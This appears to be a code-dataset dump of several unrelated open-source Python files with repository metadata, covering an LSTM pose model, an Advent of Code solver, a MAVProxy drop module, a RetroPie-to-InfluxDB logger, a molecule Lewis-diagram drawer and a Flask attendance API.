3f45cc0f001ac5d25705834541d55938bf1907b6
|
[
"MIT"
] | 13
|
2019-03-29T13:39:36.000Z
|
2021-09-07T11:15:45.000Z
|
lib/core/network.py
|
lck1201/seq2seq-3Dpose
|
3f45cc0f001ac5d25705834541d55938bf1907b6
|
[
"MIT"
] | 1
|
2019-12-14T21:12:17.000Z
|
2019-12-14T21:12:17.000Z
|
lib/core/network.py
|
lck1201/seq2seq-3Dpose
|
3f45cc0f001ac5d25705834541d55938bf1907b6
|
[
"MIT"
] | null | null | null |
import mxnet as mx
from mxnet import nd
from mxnet import gluon
from mxnet.gluon import nn, rnn
from config import config
nJoints = config.NETWORK.nJoints
class MyLSTM(gluon.Block):
def __init__(self, cfg, **kwargs):
super(MyLSTM, self).__init__(**kwargs)
self.hidden_dim = cfg.NETWORK.hidden_dim
with self.name_scope():
self.drop1 = nn.Dropout(cfg.NETWORK.dropout1)
self.drop2 = nn.Dropout(cfg.NETWORK.dropout2)
self.encoder = rnn.LSTMCell(hidden_size=self.hidden_dim, prefix='encoder_')
self.decoder = rnn.LSTMCell(hidden_size=self.hidden_dim, prefix='decoder_')
self.output_layer = nn.Dense(3*nJoints)
def forward(self, inputs, init_state, start_token):
state = init_state
for item in inputs:
mid_hidden, state = self.encoder(self.drop1(item), state)
# decoder
ins = start_token
pred = [] #seqLength, 64x(3x16)
for i in range(config.DATASET.seqLength):
hidden_state, state = self.decoder(self.drop1(ins), state)
output = self.output_layer(self.drop2(hidden_state)) + ins
ins = output
pred.append(output)
return pred
def get_net(cfg):
return MyLSTM(cfg)
| 36.657143
| 87
| 0.639127
| 165
| 1,283
| 4.806061
| 0.369697
| 0.045397
| 0.04918
| 0.047919
| 0.100883
| 0.100883
| 0.100883
| 0.100883
| 0
| 0
| 0
| 0.01367
| 0.258769
| 1,283
| 35
| 88
| 36.657143
| 0.820189
| 0.021044
| 0
| 0
| 0
| 0
| 0.012759
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.166667
| 0.033333
| 0.366667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9da6ebaaad2c77b2b6e79ec9dbb080561fa3b98
| 1,138
|
py
|
Python
|
day10/day10.py
|
ecly/a
|
73642e7edae484984430492ca9b62bd52b315a50
|
[
"MIT"
] | null | null | null |
day10/day10.py
|
ecly/a
|
73642e7edae484984430492ca9b62bd52b315a50
|
[
"MIT"
] | null | null | null |
day10/day10.py
|
ecly/a
|
73642e7edae484984430492ca9b62bd52b315a50
|
[
"MIT"
] | null | null | null |
import sys
def print_lights(lights):
x = [x for x,y in lights.keys()]
y = [y for x,y in lights.keys()]
minx, maxx = min(x), max(x)
miny, maxy = min(y), max(y)
if maxy - miny < 18:
result = []
for y in range(miny, maxy+1):
for x in range(minx, maxx+1):
result.append("#" if (x, y) in lights else ".")
result.append('\n')
return ''.join(result)
return False
def step(lights):
return {(x + vx, y + vy): (vx, vy) for (x, y), (vx, vy) in lights.items()}
def parse(line):
pos, vel = line[10:].strip().split("> velocity=<",)
posx, posy = [int(i) for i in pos.split(", ")]
velx, vely = [int(i) for i in vel[:-1].split(", ")]
return posx, posy, velx, vely
def main():
lights = {}
for line in sys.stdin.readlines():
posx, posy, velx, vely = parse(line)
lights[posx, posy] = (velx, vely)
for i in range(25000):
result = print_lights(lights)
if result:
print(result)
print(i)
break
lights = step(lights)
if __name__ == '__main__':
main()
| 23.708333
| 78
| 0.516696
| 164
| 1,138
| 3.52439
| 0.310976
| 0.027682
| 0.025952
| 0.051903
| 0.093426
| 0.058824
| 0
| 0
| 0
| 0
| 0
| 0.015424
| 0.316344
| 1,138
| 47
| 79
| 24.212766
| 0.727506
| 0
| 0
| 0
| 0
| 0
| 0.024605
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.114286
| false
| 0
| 0.028571
| 0.028571
| 0.257143
| 0.114286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9dbe4020052218bd87d8a5c72620da1aa4c792c
| 1,850
|
py
|
Python
|
fuzzystring.py
|
ZackDev/fuzzystring
|
70d5e55f8cf90bcebdb491ba26baa3e05d479189
|
[
"MIT"
] | null | null | null |
fuzzystring.py
|
ZackDev/fuzzystring
|
70d5e55f8cf90bcebdb491ba26baa3e05d479189
|
[
"MIT"
] | null | null | null |
fuzzystring.py
|
ZackDev/fuzzystring
|
70d5e55f8cf90bcebdb491ba26baa3e05d479189
|
[
"MIT"
] | null | null | null |
import re
import random
import string
import os
supported_types = ['a', 'n', 's']
count_types = []
def fuzzyfy(types, length):
# check type and length parameters for validity
try:
int(length)
except Exception:
return None
if types == '' or types == "":
return None
elif length < 1:
return None
for type in types:
try:
supported_types.index(type)
except Exception:
return None
for type in types:
type_occured = False
for counter in count_types:
if counter[0] == type:
counter[1] += 1
type_occured = True
if type_occured is False:
count_types.append([type, 1])
for counter in count_types:
if counter[1] > 1:
return None
# build fuzzy string
fuzzystr = str("")
for i in range(0, length):
fuzzystr += str(_type_to_char(random.choice(types)))
# check fuzzy string for expected legth
if len(fuzzystr) == length:
return fuzzystr
else:
return None
def _type_to_char(type):
# returns character for a given type
if type == "a":
return(random.choice(string.ascii_lowercase + string.ascii_uppercase))
elif type == "n":
return(random.choice(string.digits))
elif type == "s":
return(random.choice(string.punctuation))
else:
return str("")
def test():
print(fuzzyfy('ab', 2))
print(fuzzyfy('ans', 2))
print(fuzzyfy('', 0))
print(fuzzyfy('ans', 5))
print(fuzzyfy('xxansxx', 99))
print(fuzzyfy('ansans', 9))
print(fuzzyfy('ans', 'a'))
print(fuzzyfy('an', -1))
print(fuzzyfy('ans', 11))
print(fuzzyfy('an', 1))
print(fuzzyfy('san', 5))
if __name__ == '__main__':
s = fuzzyfy('ans', 10)
print(s)
| 22.02381
| 78
| 0.571351
| 230
| 1,850
| 4.486957
| 0.330435
| 0.127907
| 0.05814
| 0.069767
| 0.158915
| 0.158915
| 0.060078
| 0
| 0
| 0
| 0
| 0.017081
| 0.303784
| 1,850
| 83
| 79
| 22.289157
| 0.784161
| 0.074054
| 0
| 0.258065
| 0
| 0
| 0.030445
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048387
| false
| 0
| 0.064516
| 0
| 0.241935
| 0.193548
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9e2dcad41a62fabe6d852cdc47cfde976426a83
| 1,510
|
py
|
Python
|
modules/drop.py
|
a-wing/mavelous
|
eef41c096cc282bb3acd33a747146a88d2bd1eee
|
[
"MIT"
] | 80
|
2015-01-02T23:23:19.000Z
|
2021-11-02T16:03:07.000Z
|
modules/drop.py
|
Y-H-T/mavelous
|
eef41c096cc282bb3acd33a747146a88d2bd1eee
|
[
"MIT"
] | 1
|
2016-04-13T15:44:23.000Z
|
2016-04-13T15:44:23.000Z
|
modules/drop.py
|
Y-H-T/mavelous
|
eef41c096cc282bb3acd33a747146a88d2bd1eee
|
[
"MIT"
] | 63
|
2015-01-03T19:35:39.000Z
|
2022-02-08T17:15:44.000Z
|
#!/usr/bin/env python
''' simple bottle drop module'''
import time
mpstate = None
hold_pwm = 983
release_pwm = 1776
drop_channel = 5
drop_time = 2.0
class drop_state(object):
def __init__(self):
self.waiting = False
self.start_drop = 0
def name():
'''return module name'''
return "drop"
def description():
'''return module description'''
return "bottle drop control"
def cmd_drop(args):
'''drop a bottle'''
mpstate.drop_state.start_drop = time.time()
mpstate.drop_state.waiting = True
mpstate.status.override[drop_channel-1] = release_pwm
mpstate.override_period.force()
print("started drop")
def check_drop(m):
'''check if drop is complete'''
if mpstate.drop_state.waiting and time.time() > mpstate.drop_state.start_drop+drop_time:
mpstate.status.override[drop_channel-1] = 0
mpstate.drop_state.waiting = False
mpstate.override_period.force()
print("drop complete")
def init(_mpstate):
'''initialise module'''
global mpstate
mpstate = _mpstate
mpstate.drop_state = drop_state()
mpstate.command_map['drop'] = (cmd_drop, "drop bottle")
print("drop initialised")
def mavlink_packet(m):
'''handle an incoming mavlink packet'''
if m.get_type() == 'RC_CHANNELS_RAW':
check_drop(m)
if m.get_type() == 'PARAM_VALUE':
if str(m.param_id) == 'RC5_FUNCTION' and m.param_value != 1.0:
print("DROP WARNING: RC5_FUNCTION=%u" % m.param_value)
| 26.491228
| 92
| 0.660265
| 204
| 1,510
| 4.676471
| 0.362745
| 0.075472
| 0.100629
| 0.072327
| 0.220126
| 0.069182
| 0
| 0
| 0
| 0
| 0
| 0.015113
| 0.211258
| 1,510
| 56
| 93
| 26.964286
| 0.785894
| 0.121192
| 0
| 0.052632
| 0
| 0
| 0.113178
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.184211
| false
| 0
| 0.026316
| 0
| 0.289474
| 0.105263
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9e532019c14012309cd048823903e390b14f730
| 3,767
|
py
|
Python
|
retropie/influx-retropie.py
|
Epaphus/personal-influxdb
|
6357bc8a1b362280b0ce79674ddd8e804573f2a9
|
[
"Apache-2.0"
] | 217
|
2020-01-07T20:25:46.000Z
|
2022-03-29T06:09:58.000Z
|
retropie/influx-retropie.py
|
Epaphus/personal-influxdb
|
6357bc8a1b362280b0ce79674ddd8e804573f2a9
|
[
"Apache-2.0"
] | 16
|
2020-02-10T12:40:23.000Z
|
2022-02-26T13:01:55.000Z
|
retropie/influx-retropie.py
|
Epaphus/personal-influxdb
|
6357bc8a1b362280b0ce79674ddd8e804573f2a9
|
[
"Apache-2.0"
] | 34
|
2020-01-15T15:42:20.000Z
|
2022-02-22T17:29:15.000Z
|
#!/usr/bin/python3
# Copyright (C) 2020 Sam Steele
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys
import xml.etree.ElementTree as ET
from datetime import datetime
from influxdb import InfluxDBClient
from influxdb.exceptions import InfluxDBClientError
INFLUXDB_HOST = 'localhost'
INFLUXDB_PORT = 8086
INFLUXDB_USERNAME = 'root'
INFLUXDB_PASSWORD = 'root'
GAMING_DATABASE = 'gaming'
f = open('/run/shm/influx-retropie', 'r')
start = datetime.utcfromtimestamp(int(f.readline().strip()))
platform = f.readline().strip()
emulator = f.readline().strip()
rom = name = os.path.basename(f.readline().strip())
end = datetime.utcfromtimestamp(int(f.readline().strip()))
duration = (end - start).seconds
f.close()
if not rom:
rom = name = emulator
platform = "Linux"
#Ignore games played less than 60 seconds
if duration < 60:
print("Ignoring '" + emulator + ": " + name +"' played less than 60 seconds")
sys.exit()
#Ignore non-games and Macintosh platform which doesn't provide game names
if platform == "macintosh" or rom.startswith("+") or rom == "Desktop.sh" or rom == "Kodi.sh" or rom == "Steam Link.sh":
print("Ignoring non-game: '" + emulator + ": " + name +"'")
sys.exit()
gamelist = os.path.expanduser('~/.emulationstation/gamelists/' + platform + '/gamelist.xml')
if os.path.exists(gamelist):
root = ET.parse(gamelist).getroot()
for game in root.findall('game'):
path = os.path.basename(game.find('path').text)
if path == name:
name = game.find('name').text
break
if platform == "nes":
platform = "NES"
elif platform == "snes":
platform = "SNES"
elif platform == "gba":
platform = "Game Boy Advance"
elif platform == "gbc":
platform = "Game Boy Color"
elif platform == "megadrive" or platform == "genesis":
platform = "Sega Genesis"
elif platform == "sega32x":
platform = "Sega 32X"
elif platform == "segacd":
platform = "Sega CD"
elif platform == "pc":
platform = "MS-DOS"
elif platform == "scummvm":
platform = "ScummVM"
elif platform == "mame-libretro":
platform = "Arcade"
elif platform == "mastersystem":
platform = "Sega MasterSystem"
else:
platform = platform.capitalize()
url = ""
image = ""
if name == "openttd":
name = "OpenTTD"
url = "https://www.openttd.org"
image = "https://www.openttd.org/static/img/layout/openttd-128.gif"
if url and image:
points = [{
"measurement": "time",
"time": start,
"tags": {
"application_id": rom,
"platform": platform,
"title": name,
},
"fields": {
"value": duration,
"image": image,
"url": url
}
}]
else:
points = [{
"measurement": "time",
"time": start,
"tags": {
"application_id": rom,
"platform": platform,
"title": name,
},
"fields": {
"value": duration
}
}]
try:
client = InfluxDBClient(host=INFLUXDB_HOST, port=INFLUXDB_PORT, username=INFLUXDB_USERNAME, password=INFLUXDB_PASSWORD)
client.create_database(GAMING_DATABASE)
except InfluxDBClientError as err:
print("InfluxDB connection failed: %s" % (err))
sys.exit()
try:
client.switch_database(GAMING_DATABASE)
client.write_points(points)
except InfluxDBClientError as err:
print("Unable to write points to InfluxDB: %s" % (err))
sys.exit()
print("Successfully wrote %s data points to InfluxDB" % (len(points)))
| 27.297101
| 123
| 0.689673
| 487
| 3,767
| 5.301848
| 0.418891
| 0.046476
| 0.027111
| 0.012393
| 0.149497
| 0.10457
| 0.072812
| 0.072812
| 0.072812
| 0.072812
| 0
| 0.008267
| 0.165118
| 3,767
| 137
| 124
| 27.49635
| 0.812719
| 0.182373
| 0
| 0.264151
| 0
| 0
| 0.236542
| 0.017618
| 0.009434
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.018868
| 0.04717
| 0
| 0.04717
| 0.04717
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9e56f5f70dd474993a40687a674f32c37bed1cb
| 7,470
|
py
|
Python
|
molecule.py
|
Ved-P/molecule
|
9727a9e7f8c0412feee27bbe034a1540cff7534e
|
[
"MIT"
] | null | null | null |
molecule.py
|
Ved-P/molecule
|
9727a9e7f8c0412feee27bbe034a1540cff7534e
|
[
"MIT"
] | 1
|
2022-01-03T20:07:31.000Z
|
2022-01-04T18:45:21.000Z
|
molecule.py
|
Ved-P/molecule
|
9727a9e7f8c0412feee27bbe034a1540cff7534e
|
[
"MIT"
] | null | null | null |
# Molecule
#
# This program takes in a molecular formula and creates a Lewis diagram and a 3D
# model of the molecule as the output.
#
# Author: Ved Pradhan
# Since: December 31, 2021
import json
import matplotlib.pyplot as plt
import sys
import math
# Opens the JSON file for use.
with open("elements.json", "r", encoding="utf8") as file:
data = json.load(file)
# Gets the formula and charge from the user.
formula = input("\n\n\nWelcome to Molecule! Please enter a molecular formula "
+ "(case sensitive): ")
temp = input("What is the charge of the molecule? Enter an integer (0 for no "
+ "charge): ")
try:
charge = int(temp)
except ValueError:
print("Error: '" + temp + "' is not a valid charge.\n\n\n")
sys.exit()
# A list to store each individual atom in the molecule.
atoms = []
# A dictionary to store each type of element and its frequency.
element_frequency = {}
# A list to store the bonds between Atom objects.
bonds = []
# Class to represent each individual atom in the molecule.
class Atom:
def __init__(self, symbol):
self.symbol = symbol
self.element = get_element(symbol)
if self.element != False:
self.enegativity = self.element["electronegativity_pauling"]
self.expected_ve = self.get_valence_electrons()
self.loose_ve = 0
self.sigma_bonds = 0
self.pi_bonds = 0
self.formal_charge = 0
self.total_ve = 0
self.lewis_x = 0
self.lewis_y = 0
# Returns the number of valence electrons the atom is expected to have.
def get_valence_electrons(self):
if self.symbol == "He":
return 2
elif 9 <= self.element["ypos"] <= 10:
return 2
elif 2 <= self.element["xpos"] <= 12:
return 2
else:
return self.element["xpos"] % 10
# Updates the formal charge of the atom.
def update_formal_charge(self):
self.formal_charge = self.expected_ve - self.loose_ve - self.sigma_bonds - self.pi_bonds
# Updates the total number of valence electrons, including shared ones.
def update_total_ve(self):
self.total_ve = self.loose_ve + 2 * (self.sigma_bonds + self.pi_bonds)
# Returns essential information about the atom as a string.
def __str__(self):
return (self.element["name"] + ": " + str(self.loose_ve) + " loose, "
+ str(self.sigma_bonds) + " sigma, " + str(self.pi_bonds) + " pi")
# Retrieves the element corresponding to the given symbol.
def get_element(symbol):
for element in data["elements"]:
if element["symbol"] == symbol:
return element
print("Error: Element '" + symbol + "' not found.\n\n\n")
return False
# Parses through the inputted formula, splitting it into elements and frequencies.
def parse(form):
i = 1
while i < len(form) and not(ord('A') <= ord(form[i]) <= ord('Z')):
i += 1
j = i - 1
while j >= 0 and ord('0') <= ord(form[j]) <= ord('9'):
j -= 1
if j < 0:
print("Error: The formula cannot start with a number.\n\n\n")
sys.exit()
symbol_part = form[:j+1]
number_part = form[j+1:i]
rest = form[i:]
ele = get_element(symbol_part)
if number_part == "":
number = 1
else:
number = int(number_part)
element_frequency[symbol_part] = number
for i in range(number):
atoms.append(Atom(symbol_part))
if len(rest) > 0:
parse(rest)
# Prints a "not supported" message and quits the program.
def noSupport():
print("Sorry, this molecule is not supported yet.\n\n\n")
sys.exit()
# Checks if the molecule is supported.
def check():
if len(element_frequency) != 2:
noSupport()
symb1 = list(element_frequency)[0]
symb2 = list(element_frequency)[1]
global center
global outer
if symb1 == "H":
center = symb2
outer = symb1
elif symb2 == "H":
center = symb1
outer = symb2
elif get_element(symb1)["electronegativity_pauling"] < get_element(symb2)["electronegativity_pauling"]:
center = symb1
outer = symb2
elif get_element(symb1)["electronegativity_pauling"] > get_element(symb2)["electronegativity_pauling"]:
center = symb2
outer = symb1
else:
noSupport()
if element_frequency[center] != 1:
noSupport()
# Bonds two atoms together; updates in the object and the data structure.
def bond(atom1, atom2, type):
bonds.append((atom1, atom2, type))
if (type == "sigma"):
atom1.sigma_bonds += 1
atom2.sigma_bonds += 1
if (type == "pi"):
atom1.pi_bonds += 1
atom2.pi_bonds += 1
# Distributes the valence electrons as loose ones or through bonds.
def distribute():
total_ve = 0
for a in atoms:
total_ve += a.expected_ve
total_ve -= charge
left_ve = total_ve
global centerAtom
centerAtom = -1
global outerAtoms
outerAtoms = []
for a in atoms:
if a.symbol == center:
centerAtom = a
elif a.symbol == outer:
outerAtoms.append(a)
for o in outerAtoms:
bond(centerAtom, o, "sigma")
left_ve -= 2
want_ve = -1
if outer == "H" or outer == "He":
want_ve = 0
else:
want_ve = 6
if left_ve // len(outerAtoms) >= want_ve:
for o in outerAtoms:
o.loose_ve += want_ve
left_ve -= want_ve
if left_ve >= 0:
centerAtom.loose_ve += left_ve
else:
noSupport()
# Draws the lewis diagram using matplotlib.
def draw_lewis():
centerAtom.lewis_x = 0
centerAtom.lewis_y = 0
plt.style.use('_mpl-gallery')
fig, ax = plt.subplots()
fig.suptitle(formula, fontsize=14, fontweight='bold')
ax.text(0, 0, centerAtom.symbol, verticalalignment='center', horizontalalignment='center')
for i in range(len(outerAtoms)):
o = outerAtoms[i]
o.lewis_x = math.cos(2 * i * math.pi / len(outerAtoms))
o.lewis_y = math.sin(2 * i * math.pi / len(outerAtoms))
ax.text(o.lewis_x, o.lewis_y, o.symbol, verticalalignment='center', horizontalalignment='center')
for b in bonds:
x1 = (2 * b[0].lewis_x + b[1].lewis_x) / 3
x2 = (b[0].lewis_x + 2 * b[1].lewis_x) / 3
y1 = (2 * b[0].lewis_y + b[1].lewis_y) / 3
y2 = (b[0].lewis_y + 2 * b[1].lewis_y) / 3
plt.plot([x1, x2], [y1, y2], color='gray')
for a in atoms:
x_shift = 0
y_shift = 0
for i in range(a.loose_ve):
if 0 <= i <= 1:
x_shift = -0.2
elif 2 <= i <= 3:
y_shift = -0.2
elif 4 <= i <= 5:
x_shift = 0.2
elif 6 <= i <= 7:
y_shift = 0.2
if i == 0 or i == 5:
y_shift = 0.05
elif i == 1 or i == 4:
y_shift = -0.05
elif i == 2 or i == 7:
x_shift = -0.05
elif i == 3 or i == 6:
x_shift = 0.05
ax.scatter(x = a.lewis_x + x_shift, y = a.lewis_y + y_shift + 0.03,
s = 4, color='black')
axes = plt.gca()
axes.set_aspect(1)
plt.xlim([-1.75, 1.75])
plt.ylim([-1.7, 1.8])
axes.axes.xaxis.set_visible(False)
axes.axes.yaxis.set_visible(False)
plt.show()
parse(formula)
check()
distribute()
print(element_frequency)
for a in atoms:
print(a)
draw_lewis()
print("\n\n\n")
| 30.995851
| 107
| 0.58822
| 1,064
| 7,470
| 4.016917
| 0.225564
| 0.005147
| 0.009827
| 0.010295
| 0.142957
| 0.118858
| 0.049602
| 0.049602
| 0.049602
| 0.049602
| 0
| 0.030967
| 0.291031
| 7,470
| 240
| 108
| 31.125
| 0.776057
| 0.148728
| 0
| 0.147208
| 0
| 0
| 0.09378
| 0.019735
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060914
| false
| 0
| 0.020305
| 0.005076
| 0.121827
| 0.035533
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9e7b5a8abbdd10976c1ff71d253777d5ecde531
| 9,185
|
py
|
Python
|
app/transaction/attendence.py
|
rrsk/hiwayPay
|
c84b7581475164751f64540a521b803bdf08a9fb
|
[
"MIT"
] | 31
|
2020-07-01T06:40:16.000Z
|
2022-03-30T18:49:02.000Z
|
app/transaction/attendence.py
|
rrsk/hiwayPay
|
c84b7581475164751f64540a521b803bdf08a9fb
|
[
"MIT"
] | 2
|
2020-11-02T06:21:23.000Z
|
2021-06-02T00:31:06.000Z
|
app/transaction/attendence.py
|
rrsk/hiwayPay
|
c84b7581475164751f64540a521b803bdf08a9fb
|
[
"MIT"
] | 13
|
2020-07-02T07:06:05.000Z
|
2022-03-15T11:34:41.000Z
|
from flask import Blueprint
from flask import render_template, redirect, url_for, request, session, jsonify
from flask_login import login_user, logout_user, current_user
from app.transaction import bp
from app.transaction.model_att import Attendence, AttendenceSchema , CompanySchema
from app.employee.model import Employee
from app.master.model import Company
from app import db, ma
from datetime import datetime
import json
@bp.route('/attendence/', methods=['GET'])
def show_attendence():
return render_template('transaction/attendence.html')
@bp.route('/attendence/get', methods=['POST'])
def get_attendence():
if request.method == "POST":
payload = request.json
if payload != None:
payload_date = payload['date'].split('-')
payload_date = datetime(
int(payload_date[0]), int(payload_date[1]), int(1))
company = payload['company']
data = Attendence.query.filter(
Attendence.company.any(Company.id == int(company)), Attendence.date == payload_date).all()
data_schema = AttendenceSchema(many=True)
json_data = data_schema.dumps(data)
return jsonify(json_data)
else:
return jsonify({'message': 'Empty Data Recieved'})
else:
return jsonify({'message': 'Invalid HTTP Request , use POST.'})
@bp.route('/attendence/employee/<emp_id>', methods=['GET'])
def emp_attendence(emp_id):
if request.method == "GET":
year = datetime(datetime.now().year, 1, 1)
data = Attendence.query.filter(
Attendence.employee.any(Employee.id == int(emp_id)), Attendence.date >= year).all()
day_att = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
early_att = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
late_att = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
for item in data:
index = int(datetime.strptime(
str(item.date).split(" ")[0], "%Y-%m-%d").month)-1
day_att[index] = item.daysatt
early_att[index] = item.earlygoing
late_att[index] = item.latecomin
json_data = json.dumps(
{'day_att': day_att, 'early_att': early_att, 'late_att': late_att})
return jsonify(json_data)
else:
return jsonify({'message': 'Invalid HTTP request method.'})
# @bp.route('/attendence/employee/data/<emp_id>', methods=['POST'])
# def emp_attendence_data(emp_id):
# if request.method == "POST":
# data = Attendence.query.filter(
# Attendence.employee.any(Employee.id == int(emp_id))).all()
# # data_schema = AttendenceSchema(many=True)
# today = datetime.now()
# today.year()
# return jsonify(json_data)
# else:
# return jsonify({'message': 'Invalid HTTP request method.'})
@bp.route('/attendence/summary/latecomin', methods=['POST'])
def summary_late_attendence():
if request.method == "POST":
# Setting fiscal Year
today = datetime.now()
payload_date = datetime(
int(today.year), int(1), int(1))
payload_date_end = datetime(
int(today.year + 1), int(1), int(1))
all_emps = Employee.query.filter(Employee.flag == 0).all()
payload = {}
payload_late = {}
payload_early = {}
for emp in all_emps:
data = Attendence.query.filter(Attendence.employee.any(Employee.id == int(emp.id)),
Attendence.date >= payload_date, Attendence.date <= payload_date_end).all()
day_att = 0
early_att = 0
late_att = 0
for item in data:
day_att += item.daysatt
early_att += item.earlygoing
late_att += item.latecomin
company_schema = CompanySchema(many=True)
payload_data = {'name': emp.name, 'company': company_schema.dumps(emp.company), 'day_att': day_att, 'early_att': early_att, 'late_att': late_att}
payload_late.update({emp.id: payload_data})
payload_late = sorted(payload_late.items(), key = lambda x : x[1]['late_att'])[::-1][:5]
payload_early = sorted(payload_early.items(), key = lambda x : x[1]['early_att'])[::-1][:5]
payload['early'] = payload_early
payload['late'] = payload_late
return jsonify(payload)
else:
return jsonify({'message': 'Invalid HTTP request method.'})
@bp.route('/attendence/save', methods = ['POST'])
def save_attendence():
if request.method == 'POST':
payload=request.json
if payload != None:
payload_data=payload['data']
payload_date=payload['date'].split('-')
payload_date=datetime(
int(payload_date[0]), int(payload_date[1]), int(1))
# Date checks to be done
table_columns=(
'daysatt',
'latecomin',
'earlygoing'
)
try:
# Need Update cehck inside
for item in payload_data:
new_data=Attendence()
emp=Employee.query.filter_by(
id = int(item['id'])).first()
company=Company.query.filter_by(
id = int(payload['company'])).first()
new_data.company.append(company)
new_data.employee.append(emp)
for field in table_columns:
val=item[field]
if val == '' or val is None:
continue
setattr(new_data, field, val)
setattr(new_data, 'date', payload_date)
if 'tdsval' in item.keys():
if item['tdsval'] != "":
setattr(new_data, 'tds', item['tdsval'])
if 'other_deduction' in item.keys():
val=item['other_deduction']
if val == '' or val is None:
continue
setattr(new_data, 'other_deduction',
item['other_deduction'])
if 'esival' in item.keys():
if item['esival'] != "":
setattr(new_data, 'esi', item['esival'])
if 'pfval' in item.keys():
if item['pfval'] != "":
setattr(new_data, 'pf', item['pfval'])
db.session.add(new_data)
db.session.commit()
return jsonify({'success': 'Data Added'})
except Exception as e:
db.session.rollback()
return jsonify({'message': 'Something went wrong'})
return jsonify({'message': 'Something went wrong'})
else:
return jsonify({'message': 'Empty data.'})
@bp.route('/attendence/update', methods = ['POST'])
def update_attendence():
if request.method == 'POST':
payload=request.json
if payload != None:
table_columns=(
'daysatt',
'latecomin',
'earlygoing'
)
try:
# Need Update check inside
for item in payload:
saved_att = db.session.query(Attendence).filter_by(
id=int(item['id'])).first()
for field in table_columns:
val = item[field]
if val == '' or val is None:
continue
setattr(saved_att, field, val)
if 'tdsval' in item.keys():
val = item['tdsval']
if val == '' or val is None:
continue
setattr(saved_att, 'tds', item['tdsval'])
if 'other_deduction' in item.keys():
val = item['other_deduction']
if val == '' or val is None:
continue
setattr(saved_att, 'other_deduction',
item['other_deduction'])
if 'esival' in item.keys():
val = item['esival']
if val == '' or val is None:
continue
setattr(saved_att, 'esi', item['esival'])
if 'pfval' in item.keys():
val = item['pfval']
if val == '' or val is None:
continue
setattr(saved_att, 'pf', item['pfval'])
db.session.commit()
return jsonify({'success': 'Data Updated'})
except Exception as e:
print(str(e))
db.session.rollback()
return jsonify({'message': 'Something went wrong'})
return jsonify({'message': 'Something went wrong'})
else:
return jsonify({'message': 'Empty data.'})
| 38.919492
| 157
| 0.507349
| 968
| 9,185
| 4.68905
| 0.14876
| 0.014541
| 0.019828
| 0.023794
| 0.567526
| 0.49306
| 0.467284
| 0.430271
| 0.384666
| 0.384666
| 0
| 0.010528
| 0.369189
| 9,185
| 235
| 158
| 39.085106
| 0.772868
| 0.05988
| 0
| 0.459459
| 0
| 0
| 0.106985
| 0.009863
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032432
| false
| 0
| 0.054054
| 0.005405
| 0.172973
| 0.010811
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9e83e673a43a955f85b17deeccd1c24bc0579dc
| 3,385
|
py
|
Python
|
examples/monitor.py
|
seba-1511/randopt
|
74cefcc734c6a38418151025b0a4d8b6cb41eb14
|
[
"Apache-2.0"
] | 115
|
2016-11-21T06:44:19.000Z
|
2022-01-21T22:21:27.000Z
|
examples/monitor.py
|
seba-1511/randopt
|
74cefcc734c6a38418151025b0a4d8b6cb41eb14
|
[
"Apache-2.0"
] | 26
|
2016-11-21T07:31:37.000Z
|
2019-01-16T14:13:23.000Z
|
examples/monitor.py
|
seba-1511/randopt
